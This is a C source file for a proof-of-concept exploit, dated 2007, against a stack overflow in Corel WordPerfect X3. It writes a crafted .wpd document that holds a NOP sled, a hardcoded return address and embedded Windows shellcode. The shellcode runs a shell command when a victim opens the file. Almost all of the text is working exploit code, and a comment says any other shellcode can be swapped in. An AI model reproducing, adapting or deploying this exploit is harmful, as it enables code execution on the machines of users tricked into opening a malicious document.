227 lines
No EOL
6.8 KiB
C
227 lines
No EOL
6.8 KiB
C
/**
|
|
* wp13exp.c - Wordperfect X3 remote exploit
|
|
*
|
|
* Proof of concept exploit for a stack based overflow in
|
|
* Corel Wordperfext X3. The vulnerability can be exploited
|
|
* by tricking a user into opening a specially crafted document.
|
|
*
|
|
* Usage:
|
|
*
|
|
* c:\win13exp evildoc.wpd
|
|
*
|
|
* Original advisory: http://www.nop-art.net/advisories/wpwin13.txt
|
|
* Author: Jonathan So [ jonny [ @ ] nop-art.net ]
|
|
*/
|
|
|
|
#define WINDOWS
|
|
//#define LINUX
|
|
|
|
#ifdef WINDOWS
|
|
#include <windows.h>
|
|
#endif
|
|
#include <stdio.h>
|
|
|
|
// Tested for Wordperfect X3 (13.0.0.565) on XP SP2
|
|
#define RET_ADDR 0x0012DF50
|
|
|
|
// Don't change these
|
|
#define PKT_INDEX_SIZE 14
|
|
#define HEADER_SIZE 512
|
|
#define PRINTSEL_PKT_SIZE 530
|
|
#define PRINTSEL_FAKE_SIZE 713
|
|
#define FONTDESC_PKT_SIZE 420
|
|
|
|
// WordPerfect file header
|
|
struct wp_header {
|
|
unsigned char file_id[4];
|
|
unsigned long doc_ptr;
|
|
unsigned char product_type;
|
|
unsigned char document_type;
|
|
unsigned char major_version;
|
|
unsigned char minor_version;
|
|
unsigned short encryption;
|
|
unsigned short index_ptr;
|
|
unsigned char reserved[4];
|
|
unsigned long file_size;
|
|
unsigned char extended_header[488];
|
|
};
|
|
|
|
// Index for data packet
|
|
struct packet_index {
|
|
unsigned char flags;
|
|
unsigned char packet_type;
|
|
unsigned short use_count;
|
|
unsigned short hidden_count;
|
|
unsigned long size;
|
|
unsigned long data_ptr;
|
|
};
|
|
|
|
// This WinExec shellcode locates kernel32.dll using PEB method before
|
|
// calling WinExec (using the string at the end of the shellcode) and
|
|
// finally calling ExitProcess. Should work for XP/2000/2003/NT but
|
|
// any shellcode should plug straight in, up to 420 bytes and it doesn't
|
|
// matter if it contain nulls.
|
|
char shellcode[] =
|
|
"\xb8\x7e\xd8\xe2\x73\x50\xe8\x21\x00\x00\x00\x83\xc4\x04\x50\xb8\x98\xfe\x8a\x0e\x50\xe8\x12\x00\x00\x00"
|
|
"\x83\xc4\x04\x50\xeb\x62\x5e\x58\x6a\x00\x56\xff\xd0\x58\x6a\x00\xff\xd0\x33\xc0\x64\xa1\x30\x00\x00\x00"
|
|
"\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\x8b\x45\x3c\x8b\x54\x05\x78\x03\xd5\x8b\x5a\x20\x8b\x4a\x18\x03"
|
|
"\xdd\xe3\x30\x49\x8b\x34\x8b\x03\xf5\x33\xff\x33\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x03\xf8\xeb\xf4"
|
|
"\x3b\x7c\x24\x04\x75\xe1\x8b\x5a\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5a\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\xc3"
|
|
"\xe8\x99\xff\xff\xff" "cmd /c echo nop-art>c:\\test.txt && notepad c:\\test.txt\x00";
|
|
|
|
char fill_string[] = "nop-art.net";
|
|
|
|
void construct_header(struct wp_header* header) {
|
|
int i;
|
|
|
|
// These are constant for all Wordperfect documents
|
|
header->file_id[0] = -1;
|
|
header->file_id[1] = 'W';
|
|
header->file_id[2] = 'P';
|
|
header->file_id[3] = 'C';
|
|
|
|
// Document header values
|
|
header->doc_ptr = 0;
|
|
header->product_type = 0x01;
|
|
header->document_type = 0x0A;
|
|
header->major_version = 0x02;
|
|
header->minor_version = 0x01;
|
|
header->encryption = 0x00;
|
|
header->index_ptr = 0x0200;
|
|
|
|
header->reserved[0] = 0x05;
|
|
for (i=1;i<4;i++) {
|
|
header->reserved[i] = 0x00;
|
|
}
|
|
|
|
header->file_size = 0;
|
|
|
|
for (i=0;i<488;i++) {
|
|
header->extended_header[i] = 0x00;
|
|
}
|
|
}
|
|
|
|
void construct_document(FILE *fp, long ret_addr)
|
|
{
|
|
// Index packets
|
|
struct packet_index index[3] = {
|
|
{ 0x02, 0x00, 0x03, 0x00, 0x00, 0x00 },
|
|
{ 0x00, 0x55, 0x01, 0x00, 0x00, 0x00 },
|
|
{ 0x08, 0x23, 0x01, 0x00, 0x00, 0x00 }
|
|
};
|
|
|
|
struct wp_header header;
|
|
|
|
unsigned char fontdesc_packet[FONTDESC_PKT_SIZE];
|
|
unsigned char printsel_packet[PRINTSEL_PKT_SIZE];
|
|
char *char_ptr;
|
|
int i;
|
|
int offset;
|
|
|
|
construct_header(&header);
|
|
|
|
// Fill the font selection packet with NOP's
|
|
for (i=0;i<FONTDESC_PKT_SIZE;i++) {
|
|
fontdesc_packet[i] = 0x90;
|
|
}
|
|
|
|
// Set size and offset for index packets
|
|
index[1].size = FONTDESC_PKT_SIZE;
|
|
index[2].size = 713;
|
|
index[2].data_ptr = HEADER_SIZE + (PKT_INDEX_SIZE * 3);
|
|
index[1].data_ptr = index[2].data_ptr + PRINTSEL_PKT_SIZE;
|
|
|
|
// Copy shellcode into the end of the font descriptor packet
|
|
offset = index[1].size - sizeof(shellcode);
|
|
for (i=0; i < sizeof(shellcode); i++) {
|
|
fontdesc_packet[i + offset] = shellcode[i];
|
|
}
|
|
|
|
// Fill the printer selection packet with some data
|
|
for (i=0; i < PRINTSEL_PKT_SIZE ; i++) {
|
|
printsel_packet[i] = fill_string[i % sizeof(fill_string)];
|
|
}
|
|
|
|
// Add the return address on the end. Copied from a unicode buffer to non-unicode
|
|
char_ptr = (char*) &ret_addr;
|
|
for (i=8;i>0;i-=2) {
|
|
printsel_packet[PRINTSEL_PKT_SIZE-i] = *char_ptr;
|
|
printsel_packet[PRINTSEL_PKT_SIZE-(i-1)] = 0x00;
|
|
char_ptr++;
|
|
}
|
|
|
|
// Set total file size and pointer to document body
|
|
header.file_size = HEADER_SIZE + (PKT_INDEX_SIZE * 3) + PRINTSEL_PKT_SIZE + FONTDESC_PKT_SIZE;
|
|
header.doc_ptr = header.file_size;
|
|
|
|
// Now write all the data to file. Some compilers align structure members
|
|
// on different size boundaries so we have to write them all separately
|
|
fwrite((void*) &header.file_id, 4, 1, fp);
|
|
fwrite((void*) &header.doc_ptr, 4, 1, fp);
|
|
fwrite((void*) &header.product_type, 1, 1, fp);
|
|
fwrite((void*) &header.document_type, 1, 1, fp);
|
|
fwrite((void*) &header.major_version, 1, 1, fp);
|
|
fwrite((void*) &header.minor_version, 1, 1, fp);
|
|
fwrite((void*) &header.encryption, 2, 1, fp);
|
|
fwrite((void*) &header.index_ptr, 2, 1, fp);
|
|
fwrite((void*) &header.reserved, 4, 1, fp);
|
|
fwrite((void*) &header.file_size, 4, 1, fp);
|
|
fwrite((void*) &header.extended_header, 488, 1, fp);
|
|
|
|
fwrite((void*) &index[0].flags, 1, 1, fp);
|
|
fwrite((void*) &index[0].packet_type, 1, 1, fp);
|
|
fwrite((void*) &index[0].use_count, 2, 1, fp);
|
|
fwrite((void*) &index[0].hidden_count, 2, 1, fp);
|
|
fwrite((void*) &index[0].size, 4, 1, fp);
|
|
fwrite((void*) &index[0].data_ptr, 4, 1, fp);
|
|
|
|
fwrite((void*) &index[1].flags, 1, 1, fp);
|
|
fwrite((void*) &index[1].packet_type, 1, 1, fp);
|
|
fwrite((void*) &index[1].use_count, 2, 1, fp);
|
|
fwrite((void*) &index[1].hidden_count, 2, 1, fp);
|
|
fwrite((void*) &index[1].size, 4, 1, fp);
|
|
fwrite((void*) &index[1].data_ptr, 4, 1, fp);
|
|
|
|
fwrite((void*) &index[2].flags, 1, 1, fp);
|
|
fwrite((void*) &index[2].packet_type, 1, 1, fp);
|
|
fwrite((void*) &index[2].use_count, 2, 1, fp);
|
|
fwrite((void*) &index[2].hidden_count, 2, 1, fp);
|
|
fwrite((void*) &index[2].size, 4, 1, fp);
|
|
fwrite((void*) &index[2].data_ptr, 4, 1, fp);
|
|
|
|
fwrite(printsel_packet, PRINTSEL_PKT_SIZE, 1, fp);
|
|
fwrite(fontdesc_packet, FONTDESC_PKT_SIZE, 1, fp);
|
|
|
|
fclose(fp);
|
|
}
|
|
|
|
int main (int argc, char **argv)
|
|
{
|
|
FILE *fp;
|
|
unsigned long ret_addr = RET_ADDR;
|
|
|
|
if (argc < 2) {
|
|
printf("Usage: %s <filename> [-r 0xdeadbeef]\n", argv[0]);
|
|
printf(" -r <retaddr> (0x%x default)\n", ret_addr);
|
|
return 0;
|
|
}
|
|
|
|
if (argc >= 4) {
|
|
if (memcmp(argv[2], "-r", strlen(argv[2]))==0) {
|
|
ret_addr = strtoul(argv[3], NULL, 0);
|
|
}
|
|
}
|
|
|
|
if ((fp = fopen(argv[1], "wb")) == NULL) {
|
|
printf("Error creating file: %s\n", argv[1]);
|
|
return -1;
|
|
}
|
|
|
|
construct_document(fp, ret_addr);
|
|
|
|
printf("Created document %s with return address [0x%x]\n", argv[1], ret_addr);
|
|
|
|
return 0;
|
|
}
|
|
|
|
// milw0rm.com [2007-03-28]
|